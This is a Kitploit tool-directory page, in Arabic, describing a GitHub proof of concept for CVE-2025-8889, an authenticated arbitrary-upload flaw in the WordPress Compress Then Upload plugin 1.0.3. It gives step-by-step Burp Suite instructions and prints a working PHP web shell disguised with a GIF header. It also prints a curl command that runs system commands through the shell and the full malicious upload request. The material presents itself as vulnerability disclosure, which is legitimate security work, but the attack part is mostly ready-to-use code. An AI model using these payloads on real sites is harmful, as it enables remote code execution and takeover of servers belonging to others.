Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8889 — إثبات مفهوم لاستغلال CVE-2025-8889: رفع ملف تعسفي يؤدي إلى تنفيذ كود عن بعد في إضافة WordPress Compress Then Upload الإصدار 1.0.3. يتضمن إثبات مفهوم خطوة بخطوة باستخدام Burp Suite لتجاوز التحقق من MIME وتنفيذ كود PHP. | Kitploit
أدوات/GitHubGitHub/siberkampus/cve-2025-8889
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubsiberkampus/cve-2025-8889

CVE-2025-8889

إثبات مفهوم لاستغلال CVE-2025-8889: رفع ملف تعسفي يؤدي إلى تنفيذ كود عن بعد في إضافة WordPress Compress Then Upload الإصدار 1.0.3. يتضمن إثبات مفهوم خطوة بخطوة باستخدام Burp Suite لتجاوز التحقق من MIME وتنفيذ كود PHP.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

عنوان الاستغلال: إضافة WordPress Compress Then Upload الإصدار 1.0.3 - رفع ملف تعسفي يؤدي إلى تنفيذ أوامر عن بعد (RCE)

التاريخ: 2025-07-23
مؤلف الاستغلال: محمد جليك
الصفحة الرئيسية للبائع: https://wordpress.com/plugins/compress-then-upload
رابط البرنامج: https://downloads.wordpress.org/plugin/compress-then-upload.latest-stable.zip
الإصدار: 1.0.3
تم الاختبار على: Debian، WordPress 6.8.1، Apache 2.4.62، PHP 8.2.28
CVE: CVE-2025-8889

الثغرة

إضافة "Compress Then Upload Images" في WordPress تفشل في التحقق بشكل صحيح من امتدادات الملفات وأنواع MIME أثناء رفع الصور عبر واجهة رفع الوسائط. على الرغم من وجود التحقق من جانب العميل، يمكن تجاوزها عن طريق اعتراض طلب الرفع وتعديله.

يمكن للمستخدم الموثّق الذي لديه صلاحيات رفع الوسائط (دور المؤلف أو أعلى) استغلال ذلك من خلال:

  1. رفع ملف صورة عادي أولاً
  2. اعتراض طلب الرفع (مثلًا باستخدام Burp Suite)
  3. تعديل اسم ملف الرفع ومحتوى الملف لاحتواء كود PHP خبيث
  4. الاحتفاظ برأس نوع MIME الأصلي (image/jpeg) لتجاوز عمليات التحقق الضعيفة من جانب الخادم
  5. مما يؤدي إلى تنفيذ كود PHP عشوائي (تنفيذ أوامر عن بعد، RCE) على الخادم

إثبات المفهوم (PoC)

قم بإنشاء ملف صورة عادي، مثل (أي ملف JPG صالح).

الخطوة 1: إعداد ملف صورة عادي

regular.jpg

الخطوة 2: رفع الصورة العادية عبر لوحة تحكم WordPress

  • سجل الدخول إلى لوحة تحكم WordPress بمستخدم لديه صلاحيات مؤلف على الأقل.
  • انتقل إلى الوسائط > صور الضغط ومن ثم الرفع (واجهة رفع الإضافة).
  • ارفع regular.jpg بشكل طبيعي.

الخطوة 3: اعتراض طلب الرفع وتعديله باستخدام Burp Suite

  • أثناء عملية الرفع، قم باعتراض طلب HTTP متعدد الأجزاء في Burp Suite.
  • عدّل الطلب:
    • غيّر filename="regular.jpg" إلى filename="evil.php"
    • استبدل محتوى الملف بكود PHP لشل الويب:
root@kitploit:~
GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }


Note: The GIF89a; mimics a valid GIF header to bypass weak image validations.
Keep the Content-Type as image/jpeg.

قم بإعادة توجيه الطلب المعدّل إلى الخادم.

**الخطوة 4: تشغيل شل الويب المرفوع**  
إذا نجح الرفع، فسيتم حفظ ملف PHP في دليل uploads، مثل:
http://target-site.com/wp-content/uploads/2025/07/evil.php

الوصول عبر المتصفح أو curl:

curl "http://target-site.com/wp-content/uploads/2025/07/evil.php?cmd=id"

### مثال لطلب الرفع الخبيث (Burp Suite)

```http
POST /index.php?rest_route=/wpctu-api/v1/upload HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/plain, */*
...
Content-Disposition: form-data; name="file"; filename="evil.php"
Content-Type: image/jpeg

GIF89a;
<?php
    if (isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
?>
تنزيل الأداة